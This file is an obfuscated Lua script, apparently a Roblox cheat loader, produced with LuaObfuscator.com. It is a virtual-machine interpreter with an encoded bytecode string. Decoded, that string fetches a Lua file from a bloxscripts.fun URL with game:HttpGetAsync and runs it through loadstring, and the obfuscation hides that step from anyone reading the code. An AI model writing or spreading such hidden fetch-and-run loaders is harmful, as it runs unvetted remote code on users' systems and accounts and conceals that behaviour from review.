--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (1==v0) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==4) then v16=function(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==6) then v38=nil;v38=function()local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v48==(299 -(259 + 38))) then v53=nil;v54=nil;v48=546 -(121 + 422) ;end if (v48~=(0 -0)) then else v49=0 -0 ;v50=nil;v48=1 + 0 ;end if (v48==(1267 -(131 + 1133))) then v55=nil;while true do local v87=0;while true do if (v87~=0) then else local v105=0;while true do if (v105==(1880 -(1628 + 251))) then v87=1;break;end if (0==v105) then if (v49~=(1590 -(350 + 1238))) then else local v112=0;while true do local v116=0 + 0 ;while true do if (v116==0) then if (v112~=(1846 -(926 + 920))) then else local v121=1405 -(914 + 491) ;while true do if ((3 -2)==v121) then v112=2 -1 ;break;end if (0~=v121) then else for v149=1,v33() do local v150=0 -0 ;local v151;local v152;while true do if ((1 + 0)==v150) then while true do if (v151==(1770 -(457 + 1313))) then v152=v31();if (v30(v152,1430 -(1401 + 28) ,1 -0 )~=(820 -(251 + 569))) then else local v175=0;local v176;local v177;local v178;local v179;while true do if ((2 -1)==v175) then v178=nil;v179=nil;v175=6 -4 ;end if (v175==(1 + 1)) then while true do if (v176~=(981 -(351 + 628))) then else local v185=0 + 0 ;local v186;while true do if (0==v185) then v186=1868 -(403 + 1465) ;while true do if (v186==(381 -(345 + 36))) then local v194=0;while true do if (v194~=(1 -0)) then else v186=1 + 0 ;break;end if (v194==(879 -(259 + 620))) then if (v30(v178,1 + 0 ,1 + 0 )~=(1743 -(1515 + 227))) then else v179[1 + 1 ]=v55[v179[2 + 0 ]];end if (v30(v178,1 + 1 ,1 + 1 )==(300 -(292 + 7))) then v179[3 + 0 ]=v55[v179[3]];end v194=1 + 0 ;end end end if (v186~=1) then else v176=5 -2 ;break;end end break;end end end if (0==v176) then local v187=0;while true do if (v187==0) then v177=v30(v152,7 -5 ,170 -(114 + 53) );v178=v30(v152,626 -(36 + 586) ,16 -10 );v187=2 -1 ;end if (v187==(1 -0)) then v176=1;break;end end end if (v176==(260 -(152 + 105))) then if (v30(v178,3,8 -5 )~=1) then else v179[1 + 3 ]=v55[v179[4]];end v50[v149]=v179;break;end if ((1 + 0)==v176) then local v189=842 -(57 + 785) ;while true do if ((3 -2)~=v189) then else v176=183 -(9 + 172) ;break;end if (v189==(0 + 0)) then v179={v32(),v32(),nil,nil};if (v177==(310 -(142 + 168))) then local v192=0;local v193;while true do if (v192==(1505 -(1473 + 32))) then v193=0;while true do if (v193==0) then v179[3]=v32();v179[3 + 1 ]=v32();break;end end break;end end elseif (v177==1) then v179[2 + 1 ]=v33();elseif (v177==(5 -3)) then v179[3]=v33() -((2 + 0)^(1319 -(400 + 903))) ;elseif (v177==3) then local v203=0 -0 ;local v204;local v205;while true do if ((1 + 0)==v203) then while true do if (v204==(0 -0)) then v205=0 + 0 ;while true do if ((624 -(511 + 113))==v205) then v179[3 + 0 ]=v33() -((2 + 0)^16) ;v179[1 + 3 ]=v32();break;end end break;end end break;end if (v203==0) then v204=0 + 0 ;v205=nil;v203=1 + 0 ;end end end v189=2 -1 ;end end end end break;end if (v175==(0 + 0)) then local v181=0;while true do if ((0 -0)~=v181) then else v176=0 -0 ;v177=nil;v181=1 + 0 ;end if (v181==(1 -0)) then v175=2 -1 ;break;end end end end end break;end end break;end if (v150~=0) then else v151=1551 -(1173 + 378) ;v152=nil;v150=1;end end end for v153=1,v33() do v51[v153-1 ]=v38();end v121=3 -2 ;end end end if (1==v112) then local v122=0 + 0 ;while true do if (v122~=0) then else for v155=1,v33() do v52[v155]=v33();end return v53;end end end break;end end end end if (v49~=(0 + 0)) then else local v113=0 + 0 ;local v114;while true do if (v113==(12 -(9 + 3))) then v114=0 + 0 ;while true do if (v114~=(1 + 0)) then else v52={};v53={v50,v51,nil,v52};v114=2 + 0 ;end if ((1 + 1)==v114) then v49=563 -(483 + 79) ;break;end if (v114==(0 -0)) then local v123=0;while true do if (v123==(1355 -(66 + 1289))) then v50={};v51={};v123=1;end if ((1153 -(694 + 458))==v123) then v114=828 -(22 + 805) ;break;end end end end break;end end end v105=1530 -(1348 + 181) ;end end end if (v87==(911 -(721 + 189))) then if (v49==1) then local v110=0 + 0 ;local v111;while true do if (v110==0) then v111=0;while true do if (v111~=(376 -(225 + 149))) then else v49=2;break;end if (0~=v111) then else local v117=0;while true do if (v117==0) then v54=v33();v55={};v117=1734 -(1128 + 605) ;end if (v117==1) then v111=1;break;end end end if (v111==1) then local v118=0 -0 ;while true do if (v118==(1 + 0)) then v111=1625 -(318 + 1305) ;break;end if (v118~=(1211 -(910 + 301))) then else for v144=1 + 0 ,v54 do local v145=0;local v146;local v147;local v148;while true do if (v145~=0) then else v146=0 + 0 ;v147=nil;v145=1;end if ((1 + 0)==v145) then v148=nil;while true do if (v146==(593 -(564 + 29))) then local v164=0;while true do if (v164==(1787 -(297 + 1490))) then local v171=0;while true do if (v171==(741 -(680 + 60))) then v164=2 -1 ;break;end if (v171==(0 + 0)) then v147=v31();v148=nil;v171=1;end end end if (v164~=(1527 -(808 + 718))) then else v146=2 -1 ;break;end end end if (v146==(1 + 0)) then if (v147==(2 -1)) then v148=v31()~=0 ;elseif (v147==(5 -3)) then v148=v34();elseif (v147~=3) then else v148=v35();end v55[v144]=v148;break;end end break;end end end v53[1173 -(986 + 184) ]=v31();v118=1 + 0 ;end end end end break;end end end break;end end end break;end if (v48==(1272 -(726 + 545))) then v51=nil;v52=nil;v48=2 + 0 ;end end end;v39=nil;v27=7;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==3) then v33=nil;v33=function()local v56,v57,v58,v59=v2(v25,v28,v28 + 3 + 0 );v28=v28 + (2002 -(1066 + 932)) ;return (v59 * 16777216) + (v58 * (63837 + 1699)) + (v57 * 256) + v56 ;end;v34=nil;v27=4;end if (v27==4) then v34=function()local v60=v33();local v61=v33();local v62=1170 -(793 + 376) ;local v63=(v30(v61,(592 -(235 + 356)) + 0 ,49 -(59 -30) ) * ((1 + 1)^(125 -93))) + v60 ;local v64=v30(v61,15 + 6 ,77 -46 );local v65=((v30(v61,9 + 23 )==(1 + 0)) and  -(1 + 0)) or (1 + 0) ;if (v64==(0 -0)) then if (v63==(0 + 0 + 0)) then return v65 * (1865 -(21 + 264 + 1580)) ;else local v88=(1414 -(800 + 614)) + 0 ;while true do if (v88==(0 -0)) then v64=1 + 0 + (641 -(71 + 570)) ;v62=1922 -(768 + 1154) ;break;end end end elseif (v64==(2908 -(535 + 326))) then return ((v63==(0 -0)) and (v65 * ((1 + 0)/(0 + 0)))) or (v65 * NaN) ;end return v9(v65,v64-1023 ) * (v62 + (v63/((5 -3)^(17 + 35)))) ;end;v35=nil;v35=function(v40)local v66;if  not v40 then local v82=0;while true do if (v82==((475 -(182 + 293)) + 0)) then v40=v33();if (v40==(0 -0)) then return "";end break;end end end v66=v4(v25,v28,(v28 + v40) -(1 + (0 -0)) );v28=v28 + v40 ;local v67={};for v74=1 + 0 , #v66 do v67[v74]=v3(v2(v4(v66,v74,v74)));end return v7(v67);end;v27=5;end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v41)if (v2(v41,2)==79) then v29=v1(v4(v41,1,1));return "";else local v83=v3(v1(v41,16));if v29 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v6(v83,v29);v29=nil;v89=1;end end else return v83;end end end);v27=1;end if (v27==7) then v39=function(v42,v43,v44)local v68=v42[1];local v69=v42[2];local v70=v42[3];return function(...)local v76=0;local v77;local v78;local v79;local v80;local v81;while true do if (1==v76) then v79={...};v80=v13("#",...) -1 ;v76=2;end if (v76==2) then v81=nil;v81=function()local v91=v68;local v92=v69;local v93=v70;local v94=v37;local v95={};local v96={};local v97={};for v101=(645 -(25 + 620)) + 0 ,v80 do if ((v101>=v93) or ((2337 + 837)<1025)) then v95[v101-v93 ]=v79[v101 + 1 + (936 -(209 + 727)) ];else v97[v101]=v79[v101 + 1 ];end end local v98=(v80-v93) + (690 -(267 + 422)) ;local v99;local v100;while true do local v102=0;local v103;while true do if ((v102==(947 -(289 + 658))) or (((7975 -(1240 + 160)) -2040)<=(1391 + 817))) then v103=(7116 -5627) -(658 + 831) ;while true do if ((v103==1) or ((10925 -7720)==1651)) then if (((2310 -(98 + 22))>=1201) and (v100<=3)) then if ((2851==(3407 -(212 + 344))) and (v100<=((1718 -(1669 + 47)) -1))) then if ((3972==(4478 -(182 + 324))) and (v100>(0 + 0))) then local v125=1855 -(338 + 1517) ;local v126;local v127;local v128;while true do if ((4527>2242) and ((1 + 0)==v125)) then v128=nil;while true do if ((v126==(0 + 0)) or ((2164 -1347)<(1794 -(66 + 1120)))) then local v157=1023 -(681 + 342) ;while true do if ((v157==(1975 -(562 + 1412))) or ((8430 -4579)<=607)) then v126=1 + 0 ;break;end if (((3769 -(87 + 89))>=2717) and (((0 -0) -0)==v157)) then v127=v99[2];v128=v97[v99[3 + (322 -(56 + 266)) ]];v157=3 -(699 -(337 + 360)) ;end end end if ((3941>(9302 -7089)) and (v126==1)) then v97[v127 + 1 + 0 ]=v128;v97[v127]=v128[v99[865 -(736 + 125) ]];break;end end break;end if (((2805 -(1538 + 224))>(1718 -1015)) and (v125==(462 -(305 + 157)))) then v126=(0 -0) -0 ;v127=nil;v125=(1771 -(1339 + 428)) -3 ;end end else local v129=0;local v130;local v131;while true do if ((((556 + 814) -(397 + 379))<=(4033 -2443)) and (v129==1)) then while true do if ((v130==(0 + 0)) or ((2227 + (2458 -(534 + 573)))<=(2695 -1617))) then v131=v99[1 + 1 ];v97[v131]=v97[v131](v14(v97,v131 + 1 ,v78));break;end end break;end if ((((5975 -(1238 + 295)) -(1400 + 199))>(613 + 1565)) and (v129==(0 -0))) then v130=(591 + 42) -(591 + 42) ;v131=nil;v129=3 -(2 + 0) ;end end end elseif ((v100>(776 -((293 -231) + 712))) or (((1071 + 6914) -4889)<(3905 -(1074 + 252)))) then v97[v99[3 -1 ]]=v99[1 + 2 ]~=0 ;else do return;end end elseif ((v100<=(3 + 2)) or (3430<(622 + 429))) then if ((v100>(1810 -(634 + 1172))) or (1765<=(530 + (2200 -974)))) then local v133=0 + 0 + 0 ;local v134;local v135;local v136;local v137;local v138;local v139;while true do if ((v133==((97 + 132) -(223 + 4))) or (((2829 + 7612) -6654)<=(4396 -1785))) then v138=nil;v139=nil;v133=13 -10 ;end if ((((5221 -(571 + 1390)) -1594)==1666) and (v133==(1543 -(1138 + 402)))) then while true do if ((v134==(1625 -(658 + (2665 -1699)))) or (4083>((4013 + 1891) -(558 + 513)))) then v137=nil;v138=nil;v134=1 + 1 ;end if ((v134==(1927 -((1678 -(140 + 32)) + 421))) or ((3682 -((2708 -(205 + 1143)) + 143))>=(4458 -(522 + 385)))) then local v163=0;while true do if (((1665 -547)>(6 + 60 + 492)) and (v163==(0 -0))) then v135=201 -(32 + 169) ;v136=nil;v163=1 + 0 ;end if ((1==v163) or (526==1077)) then v134=368 -(286 + 81) ;break;end end end if (((1286 + (1876 -(446 + 947)))>(353 + 1336)) and (v134==(5 -3))) then v139=nil;while true do if (((3641 -(687 + 433))==(8737 -6216)) and (v135==((0 -0) + 0))) then local v168=299 -(118 + 181) ;local v169;while true do if (((1711 -(1287 + 424))==v168) or ((5802 -3563)>=(12608 -8555))) then v169=0 -0 ;while true do if ((2267>=(4519 -3100)) and ((1174 -(449 + 725))==v169)) then v136=v99[2];v137,v138=v94(v97[v136](v14(v97,v136 + 1 + 0 ,v99[290 -(260 + 27) ])));v169=1790 -(758 + 1031) ;end if ((v169==(1 + 0)) or (4428<(568 + 1227))) then v135=1;break;end end break;end end end if (((6166 -4820)==((2269 -1261) + 338)) and (v135==(1342 -(316 + 1024)))) then for v172=v136,v78 do local v173=1379 -(859 + 520) ;local v174;while true do if ((0==v173) or ((5549 -1022)<((5409 -1958) + 971))) then v174=967 -(21 + 946) ;while true do if (((2441 + 2384)>=((5004 + 2539) -4690)) and (v174==(0 + 0))) then v139=v139 + 1 + (0 -0) ;v97[v172]=v137[v139];break;end end break;end end end break;end if (((2366 -(384 + (567 -285)))<=(4972 -1720)) and (v135==(1202 -(94 + 1107)))) then local v170=1183 -(501 + 619 + 63) ;while true do if (((234 + 484 + 1982)>(2016 -(166 + 1144))) and (v170==(1548 -(561 + 987)))) then local v180=0 + 0 + 0 ;while true do if (((9948 -5364)>((1375 + 275) -615)) and (v180==(0 -(1989 -(1239 + 750))))) then v78=(v138 + v136) -(1 + 0) ;v139=0 + 0 + 0 ;v180=1 + 0 ;end if ((v180==(1 + 0)) or ((8959 -(6691 -2512))<=(6213 -1882))) then v170=1 + 0 ;break;end end end if ((279<1455) and (v170==(393 -(260 + 132)))) then v135=298 -(281 + 15) ;break;end end end end break;end end break;end if ((v133==(1 -0)) or ((4561 -(284 + 1676))>=(5993 -(986 + 831)))) then v136=nil;v137=nil;v133=3 -1 ;end if ((3689==3689) and (v133==(34 -(8 + 26)))) then v134=0;v135=nil;v133=1 -0 ;end end else v97[v99[662 -(578 + 82) ]]=v99[2 + 1 ];end elseif (((8751 -6506)==(1616 + 629)) and (v100==6)) then v97[v99[1 + 1 ]]();else v97[v99[5 -3 ]]=v44[v99[6 -3 ]];end v77=v77 + 1 ;break;end if ((v103==(0 -0)) or (1035>=(4827 -(74 + 1323)))) then local v115=0 -0 ;while true do if (((6038 -(1006 + 2442))==((1286 + 2142) -(715 + 123))) and (v115==(1644 -(472 + 1171)))) then v103=(1 + 0) -0 ;break;end if (((2057 + 517)>=(1231 -(29 + 204))) and (v115==(0 -0))) then v99=v91[v77];v100=v99[1];v115=389 -(103 + 285) ;end end end end break;end end end end;v76=3;end if (v76==3) then A,B=v37(v12(v81));if  not A[1] then local v104=v42[4][v77] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end if (v76==0) then v77=1;v78= -1;v76=1;end end end;end;return v39(v38(),{},v26)(...);end if (v27==2) then v31=function()local v71=v2(v25,v28,v28);v28=v28 + 1 ;return v71;end;v32=nil;v32=function()local v72,v73=v2(v25,v28,v28 + (3 -1) );v28=v28 + (5 -3) ;return (v73 * (173 + 83)) + v72 ;end;v27=3;end if (v27==1) then v30=nil;v30=function(v45,v46,v47)if v47 then local v84=(v45/((466 -(406 + 58))^(v46-((1156 + 142) -((1399 -(1150 + 218)) + 1266)))))%((1 + 1)^(((v47-(1983 -(688 + 1294))) -(v46-(522 -(381 + 140)))) + 1 + 0)) ;return v84-(v84%(1 -0)) ;else local v85=(0 -0) + 0 + 0 ;local v86;while true do if (v85==((0 + 0) -0)) then v86=(2 -0)^(v46-1) ;return (((v45%(v86 + v86))>=v86) and ((192 + 152) -(299 + 44))) or (26 -(16 + 10)) ;end end end end;v31=nil;v27=2;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032E3O00682O7470733A2O2F626C6F78736372697074732E66756E2F736372697074732F373537346166626534382E6C756100093O0012073O00013O001207000100023O002001000100010003001204000300044O0003000400014O0005000100049O0000022O00063O000100012O00023O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end end end
